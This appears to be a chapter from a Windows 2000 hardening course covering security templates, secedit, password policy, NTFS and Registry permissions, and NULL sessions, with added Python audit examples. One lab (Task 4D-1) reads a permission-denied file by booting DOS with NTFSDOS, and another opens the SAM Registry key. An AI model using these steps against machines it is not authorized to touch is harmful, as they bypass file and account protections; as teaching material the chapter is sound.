Group policies that have been implemented for computers are refreshed every 90 minutes (plus a random offset of up to 30 minutes, so that all computers do not contact a domain controller at once).

Group policies that have been implemented for domain controllers are refreshed every five minutes.

Settings applied locally with Configure Computer Now take effect immediately, but in a domain any conflicting setting is reasserted by the domain policy at the next refresh.

TASK 4C-7
Implementing the Template

Setup: You are logged on to Windows 2000 as the renamed Administrator account. The MMC is open, and the Security Templates snap-in has been added, as well as the Security Configuration and Analysis snap-in.

1. Right-click the Security Configuration and Analysis snap-in, and choose Configure Computer Now.
2. Keep the default location for error logs, and click OK. It will take several minutes to apply the template. There will be no message on-screen once it has been implemented; you will simply be back at the MMC.
3. Run the analysis again to confirm that the configuration has taken place.
4. Close the MMC without saving changes.

The secedit.exe Utility

Although the graphical tools are excellent methods of implementation and analysis, there are command-line functions that can also be used to increase the security of the local machine and the network. Specifically discussed in this section is the tool secedit.exe.

Secedit.exe is a command-line tool that can create and apply security templates and analyze system security configurations; it works from the same .sdb databases and .inf templates as the snap-in, through its /analyze, /configure, /export, /refreshpolicy and /validate switches. This is a useful alternative to the GUI tools for checking multiple computers or for scheduling analysis sessions. You could use secedit.exe, driven from a batch file run by the Task Scheduler, to analyze all your servers every Friday night, for example, and then review the log files it writes.

TASK 4C-8
Analyzing the Current Security Settings of the Local System

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open a command prompt and enter secedit /export /CFG C:\secfile.txt to run the secedit.exe tool, indicating that the output should be placed in the secfile.txt file. Make sure that you include a space before each forward slash (/).
2. Allow the command to complete running.
3. Open the secfile.txt document with Notepad. The file is a security template in the same INF format as the predefined templates, so it can be edited and reapplied, or kept as a record of the machine's configuration at that point in time.
4. Observe the current security settings, including the password and auditing settings.
5. Close Notepad and the command prompt.

Analyzing and Implementing the Gold Standard

In order to enforce a strong password culture in your organization, you have to turn on appropriate variables in more than one policy setting; that is, you might have to tinker with all of the policies under Security Settings, Account Policies, Password Policy. In fact, to tighten up the machine, you have to implement changes to many other policies. You can do this manually, or you can configure security policies to standards recommended by people or organizations who have studied these options well, such as the Gold Standard from NIST.

Comparing Windows Defaults to the Gold Standard

The six password policies, along with the Windows defaults and the Gold Standard recommendations, are:

Enforce Password History: This policy determines how many unique passwords a user must go through before being able to reuse an old one. The Windows default is 0; the Gold Standard recommendation is 24.

Maximum Password Age: This policy determines how long a user can use the same password before being forced to change it. The Windows default is 42 days; the Gold Standard recommendation is 90 days.

Minimum Password Age: This policy determines how long a user must keep a password before being able to change it. It exists to prevent users from cycling through a list of passwords in quick succession so that they can go back to their favorite password; with a history of 24 and a minimum age of 0, a user can do that in a minute. The Windows default is 0 days; the Gold Standard recommendation is 1 day.

Minimum Password Length: This policy determines how many characters there must be in a password. The Windows default is 0, which permits blank passwords; the Gold Standard recommendation is 8.

Passwords Must Meet Complexity Requirements: This policy determines what combination of character classes must be used in a password. The Windows default is Disabled; in the Gold Standard, it is Enabled.

Store Password Using Reversible Encryption For All Users In The Domain: This policy takes a bit of explaining. Despite the high-sounding name, enabling it means that passwords are stored in a form that can be decrypted back to the cleartext, which to anyone who obtains the account database is as good as plaintext. Seems a bit silly in this day and age, doesn't it? So why have this option at all? Certain applications use protocols that require knowledge of the user's cleartext password in order to carry out specific authentication functions, for example CHAP authentication through RADIUS (and Digest authentication in IIS); in such cases the system needs the cleartext password to generate the digest. The default is Disabled, and the Gold Standard is also to leave it Disabled. It is recommended to NEVER enable this option unless absolutely required, and then only for the specific accounts that need it (the same setting is available per user account), with a full understanding of the consequences.
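As an added example (not part of the course or of Microsoft's tools), the following Python script does offline what the Security Configuration and Analysis snap-in does on the console, for the password settings just described: it parses the INF format the security templates use, compares a configuration export against the Gold Standard values, and reports each policy as a match (green check), a mismatch (red X), or undefined (no mark). The two INF texts are constructed: one stands in for the output of the secedit /export command used earlier in this lesson on a default Windows 2000 install, the other is the Gold Standard password block written as a template. The key names are the ones Windows 2000 writes into [System Access]; the policy-name table is an assumption for the example.

```python
"""Offline equivalent of an analysis run: compare the [System Access] password
settings in an exported configuration against a reference template.

Added example; not course code. The two INF texts below are constructed.
CURRENT_EXPORT stands in for the file that 'secedit /export /cfg C:\\secfile.txt'
writes on a default Windows 2000 install (the real file is UTF-16, so open it
with encoding='utf-16'); GOLD_TEMPLATE holds the Gold Standard password values
from the lesson, written in template syntax.
"""
import configparser
from typing import Dict, Optional, Tuple

CURRENT_EXPORT = """\
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Version]
signature="$CHICAGO$"
Revision=1
"""

GOLD_TEMPLATE = """\
[Unicode]
Unicode=yes
[System Access]
PasswordHistorySize = 24
MaximumPasswordAge = 90
MinimumPasswordAge = 1
MinimumPasswordLength = 8
PasswordComplexity = 1
ClearTextPassword = 0
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Template key -> the name shown in the Local Security Policy console (assumed mapping).
POLICY_NAMES = {
    "PasswordHistorySize": "Enforce password history",
    "MaximumPasswordAge": "Maximum password age",
    "MinimumPasswordAge": "Minimum password age",
    "MinimumPasswordLength": "Minimum password length",
    "PasswordComplexity": "Passwords must meet complexity requirements",
    "ClearTextPassword": "Store password using reversible encryption",
}


def parse_template(text: str) -> Dict[str, Dict[str, str]]:
    """Parse template/export text into {section: {key: value}}. Keys keep their
    case; allow_no_value lets the ACL lines of a full export (no '=') through."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.optionxform = str
    cp.read_string(text)
    return {s: {k: (v or "").strip().strip('"') for k, v in cp[s].items()} for s in cp.sections()}


def _norm(value: Optional[str]) -> Optional[str]:
    """Compare numerically where the value is an integer, otherwise as text."""
    return str(int(value)) if value is not None and value.lstrip("-").isdigit() else value


def analyze(current_text: str, template_text: str,
            section: str = "System Access") -> Dict[str, Tuple[str, Optional[str], Optional[str]]]:
    """Mimic the snap-in's three columns: for every key in either file return
    (status, template value, computer value). Status is 'ok' (green check),
    'mismatch' (red X) or 'undefined' (no mark: the template does not set it)."""
    current = parse_template(current_text).get(section, {})
    template = parse_template(template_text).get(section, {})
    report = {}
    for key in sorted(set(current) | set(template)):
        want, have = template.get(key), current.get(key)
        if want is None:
            status = "undefined"
        elif have is not None and _norm(want) == _norm(have):
            status = "ok"
        else:
            status = "mismatch"
        report[key] = (status, want, have)
    return report


def summarize(report: Dict[str, Tuple[str, Optional[str], Optional[str]]]) -> Tuple[int, int, int]:
    """Counts of (ok, mismatch, undefined)."""
    statuses = [s for s, _, _ in report.values()]
    return statuses.count("ok"), statuses.count("mismatch"), statuses.count("undefined")


if __name__ == "__main__":
    marks = {"ok": "[ok]", "mismatch": "[X ]", "undefined": "[  ]"}
    report = analyze(CURRENT_EXPORT, GOLD_TEMPLATE)
    for key, (status, want, have) in report.items():
        print(f"{marks[status]} {POLICY_NAMES.get(key, key):45} template={want!s:9} computer={have}")
    print("ok/mismatch/undefined:", summarize(report))
```

Run against a real export, the script reads the same file Task 4C-8 produces, so the comparison can be scripted for many servers and archived, which the console cannot do. The undefined status matters: a template that does not mention a setting neither checks nor changes it, exactly as the snap-in shows with no mark.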

TASK 4C-9
Configuring Policies to the Gold Standard

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. From Administrative Tools, open the Local Security Policy.
2. Expand Account Policies, and select Password Policy.
3. In the right pane, verify that the Enforce Password History policy is set to Keep Password History For 24 Passwords Remembered.
4. Double-click the Maximum Password Age policy.
5. Change the value for Passwords Expire In to 90 days, and click OK.
6. Double-click the Minimum Password Age policy.
7. Change the value to Password Can Be Changed After 1 day, and click OK.
8. Double-click the Minimum Password Length policy.
9. Change the value for Password Must Be At Least to 8 characters, and click OK.
10. Observe the Passwords Must Meet Complexity Requirements policy. You have already enabled this policy, so you can skip it here.
11. Observe the Store Password Using Reversible Encryption For All Users In The Domain policy. This policy should remain disabled, so you can skip it, too.
12. Close all open windows.

You have now set the appropriate values for the password policies to meet the NSA/NIST Gold Standard. Of course, this does not mean that your machine is now operating at Gold Standard levels. There are nearly a hundred such policies, and many other Registry entries, that can be configured with the template for the Gold Standard.

Instead of configuring each policy one at a time, as you did in the previous task, there is a template for meeting the Gold Standard provided on the data disk for you to use. The name of the file is NIST2kws.inf.

Analyzing the Gold Standard

As an administrator, you may or may not agree with the settings provided in a template. Some template settings may be too strict, while others may be too lax; it is up to you to decide. The Gold Standard is only a recommendation for a secure desktop environment. It may or may not work for your organization.

If you want, you can tinker with the settings and create your own template. Once you are satisfied with a template, you can configure the computer to match its settings. In a domain environment, remember that you also have the advantage of implementing group policies for the entire domain or for an OU within a domain, so the template is imported once rather than applied machine by machine.

TASK 4C-10
Analyzing the Gold Standard

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Copy the Gold Standard template file NIST2kws.inf from your data disk to your WINNT\security\templates folder.
2. Start the MMC, and add the Security Configuration And Analysis snap-in.
3. In the left pane, select Security Configuration And Analysis.
4. Read the instructions displayed in the right pane. Because we do not have an existing database, we will follow the instructions to create a new database.
5. Right-click Security Configuration And Analysis, and choose Open Database.
6. Name the new database goldpol, and click Open.
7. In the Import Template dialog box, select the NIST2kws.inf template and click Open.
8. Again, read the instructions displayed in the right pane. We do not want to configure the computer; we only want to analyze our computer's security settings against this template.
9. Right-click Security Configuration And Analysis, and choose Analyze Computer Now.
10. Accept the location of the error log file path, and wait a few seconds for the analysis to proceed. Your computer's security settings are being compared to the settings in the Gold Standard template.
11. When the analysis is complete, observe the security areas listed below the main scope.
12. Expand Account Policies, and select Password Policy. In the right pane, you should see three columns of information: the first column is the policy, the second is the setting specified in the template (in this case, NIST's Gold Standard), and the third shows your computer's present setting.
13. For each policy in the first column, verify that you see a green check mark. This means that your computer's setting for that policy matches the template it is being compared against. In the case of the password policies, you have already set each value manually to comply with the Gold Standard; therefore, all six policies listed here have a green check mark.
14. In the left pane, select Account Lockout Policy.
15. Observe the right pane. One of the policies, Account Lockout Threshold, has a green check mark, while the other two policies show a red X, signifying that the computer's setting differs from the template.
16. In the left pane, expand Local Policies.
17. Select Audit Policy, User Rights Assignment, and Security Options in turn. In each case, observe the policies in the right pane that are not consistent with the template.
18. In the left pane, select Restricted Groups.
19. Observe the right pane. Only one group, the Power Users group, has a green check mark. When an item has neither a green check mark nor a red X, the item was not included in the template and so was not compared.
20. Double-click the Power Users group. Observe that, according to the template, this group should have no members, nor should it be nested within any other group. Click Cancel.
21. In the left pane, select System Services, and observe the number of inconsistencies displayed in the right pane.
22. Double-click any inconsistent setting and any consistent setting, and compare the two.
23. In the left pane, select Registry, and observe the number of inconsistencies displayed in the right pane.
24. Double-click any inconsistent setting and any consistent setting, and compare the two.
25. In the left pane, select File System, and observe the number of inconsistencies displayed in the right pane.
26. Double-click any inconsistent setting and any consistent setting, and compare the two.
27. Close all open windows without saving any changes.

Topic 4D
Windows 2000 Resource Security

Many resources are available on a Windows 2000 server and network, all of which need to be secured in some manner. Let's start with the file system.

File and Folder Security

While Windows NT 4.0 could work only with the FAT and NTFS file systems, Windows 2000 can also work with FAT32. Even though Windows 2000 supports FAT and FAT32, NTFS is still recommended, because only NTFS provides file-level security: FAT and FAT32 volumes have no permissions at all, so any user who can log on to the machine can read and change any file on them.

The use of NTFS in Windows 2000, technically NTFS version 5, is required if an administrator wants to use Active Directory (the SYSVOL folder of a domain controller must be on NTFS), domains, and the advanced file security that NTFS provides. File encryption (EFS) and disk quotas also require NTFS. It is strongly recommended that all partitions still running FAT or FAT32 be converted to NTFS in order to secure Windows 2000 resources effectively. To convert a partition, use the command convert c: /FS:NTFS, where c: is the partition to be converted; a volume that is in use, such as the boot partition, is converted at the next restart.

Any new partition created as, or converted to, NTFS will by default grant the Everyone group Full Control. (You will see significant changes in this regard with Windows Server 2003, formerly .NET Server.) Because in Windows 2000 the Everyone group includes the Guest and Anonymous logons, strict security must be applied to a new volume before any user accounts are allowed to access it.

Just as a newly created partition has default security settings, so does the installed operating system. In Windows 2000, some additional measures have been added to discourage users from changing Windows' own system files: the contents of the \Winnt folder and the \System32 folder are hidden in Explorer by default, although a quick click on the Show Files option reveals everything. That is a convenience, not a security control. The mechanism that really works to your advantage is Windows File Protection (WFP), whose job is to ensure that system files installed during Windows setup are not deleted or overwritten. Only updates delivered through Microsoft-signed mechanisms (service packs, hotfixes, Windows Update, and signed driver packages) can replace a protected file; if one is changed by any other means, WFP restores the original from its cache (%systemroot%\system32\dllcache) and logs the event. You will notice this when installing, say, a Microsoft-approved device driver. Note that WFP protects a fixed list of files only; it does nothing for files added later.

File and Folder Permissions

The process for viewing permissions is the same in Windows 2000 as it was in Windows NT 4.0: right-click the object, choose Properties, and view the information on the Security tab. More detailed data is provided under the Advanced button. The permissions themselves are different: Windows 2000 exposes a finer-grained set of special permissions. Some of them are defined in the following list:

Traverse Folder/Execute File: The Traverse Folder permission applies only to folders and manages a user's ability to move through a folder to reach other files and folders, even when the user has no other permission on that folder. (By default the Bypass Traverse Checking user right is granted to Everyone, which makes this permission moot unless that right is removed.) The Execute File permission applies only to files and manages a user's ability to run program files.
List Folder/Read Data: The List Folder permission applies only to folders and manages a user's ability to view file names and folder names. The Read Data permission applies only to files and manages a user's ability to read files.
Read Attributes: This permission manages a user's ability to read the attributes of a file or folder.
Create Folders/Append Data: The Create Folders permission applies only to folders and manages a user's ability to create folders within a folder. The Append Data permission applies only to files and manages a user's ability to make changes to the end of a file.
Write Attributes: This permission manages a user's ability to modify the attributes of a file or folder.
Delete: This permission manages a user's ability to delete a file or a folder.
Read Permissions: This permission manages a user's ability to read the permissions of a file or a folder.
Change Permissions: This permission manages a user's ability to change the permissions of a file or a folder.
Take Ownership: This permission manages a user's ability to take ownership of a file or folder.

These special permissions are building blocks: by themselves they neither allow nor deny access, and the administrator must define that for each object. In general, it is not necessary to specify each of these unique permissions when securing resources. You will most likely use the standard permissions: Full Control, Modify, Read And Execute, List Folder Contents, Read, and Write. The specific abilities of each of these permissions are defined in the chart shown in Figure 4-9.

Figure 4-9: Windows 2000 NTFS folder permissions.

As you can see, when you apply the Read permission to a folder, for example, it receives List Folder/Read Data, Read Attributes, Read Extended Attributes, and Read Permissions. NTFS file permissions are similar, except that there is no List Folder Contents option, because the permissions apply to a file. One big difference from Windows NT 4.0 NTFS permissions is the ability to explicitly deny each of these permissions.

Inheritance and Propagation

When you create a new file, it inherits the permissions of its parent folder, or of the partition root if it is a root-level folder. Therefore, if a parent folder is set to Everyone Modify, a file you create in that folder will have Everyone Modify as its permissions. You can alter this behavior. When you apply permissions to a folder with the Apply Onto option set to This Folder Only, those entries are not inheritable, so new data created in the folder does not receive them; the new objects instead receive only the inheritable entries that flow through the folder from the level above. Say you have a folder D:\Secure\One whose permissions have been applied to This Folder Only, and you create a file D:\Secure\One\test.txt. This file inherits its permissions from D:\Secure (and from whatever D:\Secure inherited in turn). You can also block the inheritance of permissions entirely by clearing the Allow Inheritable Permissions From Parent To Propagate To This Object option on the Security tab of the object's Properties window. When you clear this option, you are presented with three choices:

To copy the permissions that this object has inherited, making them explicit entries on the object.

To remove all permissions except for those that have been specifically applied.

To cancel the operation and keep the permissions as they were.

Choose Copy when you want to start from the current effective permissions and then tighten them; choose Remove when you want to build the list from scratch, bearing in mind that Remove can leave the object with no entries at all, so that nobody can access it until an administrator takes ownership.

The process of setting permissions is similar to that of Windows NT 4.0, with the exception that you specifically allow or deny access. If you want to give a user or a group what was called No Access in Windows NT, you give that user or group Deny on the Full Control permission in Windows 2000. Deny entries are evaluated before Allow entries at the same level, so a Deny applied directly to an object overrides any Allow the same user receives through group membership; be aware, though, that an explicitly applied Allow on an object takes precedence over a Deny it inherits from a parent. Setting permissions is a fairly straightforward job, and one that all security professionals should be comfortable with. There is a way, however, for an attacker to get around your NTFS security if he or she is able to get physical access to the computer: booting an alternative OS, specifically MS-DOS. You might think that DOS cannot affect files on an NTFS partition, and that DOS will not even recognize the NTFS partition. In most situations this is true; however, there are tools and utilities on the market designed to access NTFS from DOS. The most common of these is simply called NTFSDOS, made by a company called Sysinternals. NTFS permissions are enforced by the running Windows kernel, not by the disk, so any operating system that can parse the file system reads everything on it; that is why physical security, a BIOS configured to boot only from the hard disk, and encryption of sensitive files with EFS matter as much as the ACLs. The following task will allow you to access a secured NTFS file via DOS.
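As an added example that is not part of the course, the following Python model implements the inheritance and evaluation rules described above so that their consequences can be checked without a test machine: This Folder Only entries that do not propagate, a folder that blocks inheritance, Deny Full Control to Everyone on a file, and an explicit Allow on a file overriding a Deny inherited from its folder. The folder tree, the user and group names, and the reduced set of rights are constructed for the example.

```python
"""Toy model of NTFS permission inheritance and access checking in Windows 2000.

Added example; not course code. It models: entries scoped to 'This folder
only' are not inherited; clearing 'Allow inheritable permissions from parent
to propagate' cuts the chain; and the canonical evaluation order explicit
Deny, explicit Allow, inherited Deny, inherited Allow, which is why Deny Full
Control to Everyone stops even an administrator while an explicit Allow on a
file wins over a Deny inherited from its folder. The rights are a reduced set
and the tree in build_demo() is constructed for the example.
"""
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Set

READ, WRITE, DELETE, FULL = "Read", "Write", "Delete", "Full Control"
ALL_RIGHTS = {READ, WRITE, DELETE}


@dataclass
class ACE:
    trustee: str                   # user or group name
    allow: bool                    # True = Allow, False = Deny
    rights: Set[str]
    this_folder_only: bool = False  # Apply Onto: This folder only
    inherited: bool = False         # set by the model when an entry is propagated

    def expanded(self) -> Set[str]:
        return set(ALL_RIGHTS) if FULL in self.rights else set(self.rights)


@dataclass
class Node:
    name: str
    explicit: List[ACE] = field(default_factory=list)
    block_inheritance: bool = False  # inheritable permissions from parent cleared
    parent: Optional["Node"] = None


def effective_acl(node: Node) -> List[ACE]:
    """Explicit entries, then entries inherited from each ancestor up to the
    first one that blocks inheritance. 'This folder only' entries never propagate."""
    acl = list(node.explicit)
    cur = node
    while not cur.block_inheritance and cur.parent is not None:
        cur = cur.parent
        for ace in cur.explicit:
            if not ace.this_folder_only:
                acl.append(ACE(ace.trustee, ace.allow, set(ace.rights), inherited=True))
    return acl


def check_access(node: Node, user: str, groups: Iterable[str], requested: Set[str]) -> bool:
    """Walk the ACL in canonical order: a matching Deny that touches any still
    outstanding right refuses; Allows accumulate until every right is granted."""
    token = {user, *groups, "Everyone"}  # Everyone is implicit for every logon
    acl = sorted(effective_acl(node), key=lambda a: (a.inherited, a.allow))
    outstanding = set(requested)
    for ace in acl:
        if ace.trustee not in token:
            continue
        if not ace.allow:
            if ace.expanded() & outstanding:
                return False
        else:
            outstanding -= ace.expanded()
            if not outstanding:
                return True
    return False  # nothing granted the remainder


def build_demo() -> Dict[str, Node]:
    """D:\\ (Everyone Full Control, the NTFS default) -> Secure (inheritance blocked;
    Administrators Full, Users Read) -> One (Users Write, this folder only) -> test.txt;
    Secure\\secret.txt carries Everyone Deny Full Control; Secure\\Shared carries an
    inheritable Deny Write for Users that memo.txt overrides with an explicit Allow."""
    root = Node("D:\\", [ACE("Everyone", True, {FULL})])
    secure = Node("Secure", [ACE("Administrators", True, {FULL}), ACE("Users", True, {READ})],
                  block_inheritance=True, parent=root)
    one = Node("One", [ACE("Users", True, {WRITE}, this_folder_only=True)], parent=secure)
    test_txt = Node("test.txt", parent=one)
    secret = Node("secret.txt", [ACE("Everyone", False, {FULL})], parent=secure)
    shared = Node("Shared", [ACE("Users", False, {WRITE})], parent=secure)
    memo = Node("memo.txt", [ACE("Users", True, {WRITE})], parent=shared)
    return {n.name: n for n in (root, secure, one, test_txt, secret, shared, memo)}


def demo_results() -> Dict[str, bool]:
    t = build_demo()
    admin, alice = ("admin", {"Administrators", "Users"}), ("alice", {"Users"})
    return {
        "alice writes One": check_access(t["One"], *alice, {WRITE}),
        "alice writes test.txt": check_access(t["test.txt"], *alice, {WRITE}),   # scope ends at One
        "alice reads test.txt": check_access(t["test.txt"], *alice, {READ}),     # via D:\Secure
        "admin reads secret.txt": check_access(t["secret.txt"], *admin, {READ}),  # explicit Deny
        "alice writes memo.txt": check_access(t["memo.txt"], *alice, {WRITE}),    # explicit Allow wins
        "alice deletes memo.txt": check_access(t["memo.txt"], *alice, {DELETE}),
        "alice writes Secure": check_access(t["Secure"], *alice, {WRITE}),        # root ACL blocked
    }


if __name__ == "__main__":
    for case, granted in demo_results().items():
        print(f"{case:25} {'allowed' if granted else 'denied'}")
```

The model stops where the real system does not: on a live machine an administrator denied by an ACL can still take ownership (the Take Ownership privilege) and then reset the permissions, which is why the task that follows says the administrator "should not" be able to open the file rather than "cannot".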

TASK 4D-1
Compromising NTFS Security

Setup: You are logged on to Windows 2000 as the renamed Administrator account. This task requires the NTFSDOS utility to be on a bootable floppy disk.

Instructor note: If you have not created boot floppies for this task, provide students with blank disks and have them create their own.

1. On your Windows 2000 boot partition, create a folder called Secure.
2. Within this folder, create a new text file called secret.txt, and add the text This is a secure file. to the document.
3. Set the security on this file so that the Everyone group has Full Control: Deny, and acknowledge the warning message. Now, not even the administrator should be able to access this file.
4. Test the security by trying to open the secret.txt file. You should not be able to access the file.
5. Restart the computer, and boot to DOS using the bootable floppy disk that holds NTFSDOS.
6. At the DOS prompt, enter ntfsdos to start the utility. The NTFS partitions are mounted, with drive letters assigned to them.
7. Navigate to the partition where you created the Secure folder, and enter cd secure to change directory to this folder.
8. Enter type secret.txt to display the text file on the screen.
9. Observe the contents of the so-called secret.txt file.
10. Remove the bootable floppy disk, and reboot the computer.

The NULL Session

In order for a system to provide shared resources to the network, it must communicate with the network, and some of that communication takes place over unauthenticated (anonymous) connections to the IPC$ share, which Windows machines use among themselves for functions such as browsing and trust enumeration. Internally, this may not present a problem, but if the machine is reachable from the Internet, the same anonymous connection allows an attacker to enumerate user and group names, share names, and the password policy without any credentials. A connection made in this manner, with the anonymous logon, is called a NULL session. To combat this situation, you should restrict the NULL session. This can be done in any of the security templates, as follows:

1. Open any of the security templates in the MMC.
2. Navigate to Local Policies.
3. Navigate to Security Options.
4. Set Additional Restrictions For Anonymous Connections to No Access Without Explicit Anonymous Permissions.

Remember that editing a template changes only the template; the setting takes effect when the template is applied to the computer or imported into a GPO. You can also set the same option directly in Local Security Policy. Either way it writes the value 2 to RestrictAnonymous under HKLM\SYSTEM\CurrentControlSet\Control\Lsa. Value 2 is the strongest choice, but it also stops legitimate anonymous use: down-level clients, Windows NT 4.0 domains that trust this domain, and the Computer Browser service can fail, so test it in a domain before rolling it out. Do not rely on it alone, either: blocking TCP ports 135 through 139 and 445 at the perimeter removes the exposure from the Internet regardless of the setting.

Windows 2000 Printer Security

When you are setting up the security options on a printer in Windows 2000, you have three permissions that you can apply: Print, Manage Printers, and Manage Documents. The default level of security provided to users is Print, meaning that they are given the right to print, pause, resume, restart, and cancel documents that they have submitted to a printer. If you want to provide users with more control over a printer, you can give them the Manage Documents permission. This level of permission means that they are given the right to pause, resume, restart, and cancel all documents that have been submitted to this printer. If you want to provide users, such as junior administrators or persons who are responsible for overall printer management, with even more control over a printer, you can give them the Manage Printers permission. This means that they are given the right to share the printer, change printer permissions, change printer properties, and delete printers.

Although setting permissions can provide you with the security you require, you can get still more control over the printer. In the Advanced settings of a printer, you can define the hours in which the printer is available. If the printer is to be used only during business hours, there is no reason to have the permissions of the printer set so that it can be used 24x7. This type of control helps to keep the device used for business purposes only.

In addition to securing the printer, you must take care to secure the spooler that holds print jobs waiting to print. If the spooler is left at the default, it is in the %systemroot%, which allows Everyone Full Control. This location should be moved to a secure NTFS location, where it can be managed individually.

Windows 2000 Registry Security

The Registry stores the configuration data for the computer and, as such, is obviously a critical item to secure properly. Thankfully, users will not have the same level of interaction with the Registry as they will with network resources.

The Windows 2000 Registry can be directly manipulated with the same tools as the Windows NT 4.0 Registry: Regedit.exe and Regedt32.exe. As mentioned earlier, it is recommended that Regedt32.exe be used, because permissions can be applied to individual keys as you see fit. When setting the primary permissions in the Registry, however, you have only Read and Full Control to choose from.

276 Hardening The Infrastructure (SCP)

The permissions that are available for the Registry are different than the permissions used for securing files. The following list contains the permissions that affect the Registry:

Query Value: Ask for and receive the value of a Registry key.
Set Value: Change a key value.
Create Subkey: Create a subkey.
Enumerate Subkeys: List the subkeys.
Notify: Set auditing.
Create Link: Link this key to some other key.
Write DAC: Change permissions.
Read Control: Find the owner of a key.
Write Owner: Change ownership of a key.
Delete: Delete the key.

Of the two permissions that can be applied, Full Control is the equivalent of all the permissions listed. The Read permission is the equivalent of the Query Value, Notify, Read Control, and Enumerate Subkeys permissions. The listing for the Read permission can be a bit misleading at times.

There is no Special Access Permission listing on the primary Permissions page, but there is an Advanced button. If a user has the Read box checked, you should review the Special Access Permissions to be sure of the exact permissions given to that user. On the same page as the special permissions are the settings for where this set of permissions is to be applied. You have the ability to apply permissions to This Key Only, This Key and Subkeys, or Subkeys Only.

Default Registry Configurations

Earlier, we discussed the processes put in place by Windows to help protect system files. There are also systems in place to protect the Registry by default. Administrators and the SYSTEM account should have Full Control to all areas of the Registry.

Power Users are given permission to create subkeys in the HKEY_LOCAL_MACHINE\SOFTWARE\ key, which has the result of allowing them to install new software packages. Power Users then have Full Control over the subkeys they create, as does the CREATOR OWNER account. The extent of control for Power Users does not expand into all areas of the Registry. For example, in the Hardware hive of the Registry, Power Users are not on the list to set permissions, by default.

When changing areas of the Registry, be sure that you have planned out the changes very carefully, as unintended consequences can happen very easily and quickly. In the following task, you will configure permissions on an area of the Registry.

audit: The independent examination of records and activities to ensure compliance with established controls, policy, and operational procedures, and to recommend any indicated changes in controls, policy, or procedures.
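To see how Regedt32's two primary check boxes relate to the special-access rights listed above, here is an added example (not from the course) that decodes a key's access mask using the KEY_* and standard-rights bit values from the Windows SDK; the ACE list it reviews is constructed for illustration, not taken from a real system:

```python
"""Decode a Registry access mask into the named rights Regedt32 exposes.

Added example, not part of the course. The bit values are the KEY_* and
standard access rights from winnt.h; the ACEs reviewed below are constructed.
"""

# Key-specific rights occupy the low 16 bits; standard rights sit in bits 16-19.
REGISTRY_RIGHTS = {
    0x00001: "Query Value",
    0x00002: "Set Value",
    0x00004: "Create Subkey",
    0x00008: "Enumerate Subkeys",
    0x00010: "Notify",
    0x00020: "Create Link",
    0x10000: "Delete",
    0x20000: "Read Control",
    0x40000: "Write DAC",
    0x80000: "Write Owner",
}

# KEY_READ: Query Value, Enumerate Subkeys, Notify and Read Control (the Read box).
KEY_READ = 0x20019
# KEY_ALL_ACCESS: every right above (the Full Control box).
KEY_ALL_ACCESS = 0xF003F


def decode_mask(mask):
    """Return the named rights present in `mask`, in winnt.h bit order."""
    return [name for bit, name in REGISTRY_RIGHTS.items() if mask & bit]


def summarize(mask):
    """Label a mask the way the primary Permissions page would show it."""
    rights = mask & KEY_ALL_ACCESS
    if rights == KEY_ALL_ACCESS:
        return "Full Control"
    if rights == KEY_READ:
        return "Read"
    return "Special Access"


def rights_beyond_read(mask):
    """Rights in `mask` that the Read box alone does not grant.

    This is what the Advanced page reveals when the text warns that the Read
    listing can be misleading.
    """
    return decode_mask(mask & KEY_ALL_ACCESS & ~KEY_READ)


# Constructed ACEs as (trustee, mask): Power Users here hold Read plus two
# write rights, which is only visible on the Advanced page.
SAMPLE_ACES = [
    ("Administrators", KEY_ALL_ACCESS),
    ("Power Users", KEY_READ | 0x00002 | 0x00004),
    ("Users", KEY_READ),
]


def review(aces):
    """Return (trustee, label, rights beyond Read) for each ACE."""
    return [(who, summarize(mask), rights_beyond_read(mask)) for who, mask in aces]


if __name__ == "__main__":
    for who, label, extra in review(SAMPLE_ACES):
        suffix = f" (also: {', '.join(extra)})" if extra and label != "Full Control" else ""
        print(f"{who:15} {label}{suffix}")
```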

TASK 4D-2
Setting Registry Permissions

1. Log on to Windows 2000 as the renamed Administrator account.
2. Open Regedt32 to prepare for setting permissions for the Registry.
3. Select the HKEY_LOCAL_MACHINE window.
4. Expand the SAM and observe that the subkey is grayed out.
5. Select the grayed-out SAM, and choose Security > Permissions.
6. In the Permission list, give the Administrators group Full Control. Click OK.
7. Expand the SAM to verify that usernames and account information are now visible to you.

Registry Backup

In order to cover the security of the Registry, you must have a backup strategy for the organization. There are several ways in which to back up the Registry. The first is in the Registry itself: you can save subkeys. If you are going to use this built-in option, be sure that you secure the saved files very well.

If you do not want to use the save option available in the Registry Editor, you can use the Microsoft Backup program. This utility can create a full backup of the System State, which includes the Registry configuration information. Just as with the saved subkeys and keys, your storage options for backups are critical. A compromised System State backup can be almost as devastating as a compromise of the server itself.

The final location to secure in regards to Registry backup is in the OS files. Stored in the %systemroot%\repair folder are settings that must be secured. This folder holds the Registry configuration information that is used in the event the system needs to be repaired.

TASK 4D-3
Saving Registry Information

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Regedt32 is running.

1. Select the Software subkey for HKEY_LOCAL_MACHINE.
2. Choose Registry > Save Key.
3. Create a folder named Reg_Keys on the Windows 2000 partition.
4. For the file name, enter Soft_One, and click Save.
5. Close the Registry Editor.
6. Open My Computer, and navigate to the Reg_Keys folder that you created. Right-click and choose Properties.
7. Select the Security tab.
8. Set the security so that only your user account has Full Control, and remove any access to any other user account or group.
9. Close all open windows.
Blocking Access to the Registry

You might want to implement normal controls on programs such as Regedit.exe and Regedt32.exe to prevent unauthorized users from executing these applications. If you are even more paranoid, however, you can completely remove the applications from the hard drive and perform remote Registry management of the machine. In the event that deleting the executable files is still not good enough for your tastes, you can go into the Registry and disable access to the Registry. Obviously, this can be a dangerous option, as you are literally disabling Registry editing tools on the local machine. You will have no choice other than remote management at this stage, so make sure that you can perform remote management prior to taking this action.

TASK 4D-4
Blocking Registry Access

Setup: You are logged on to Windows 2000 as the renamed Administrator account. For this task, you should again work in pairs, with one partner observing as the other completes the task, and then reversing the roles.

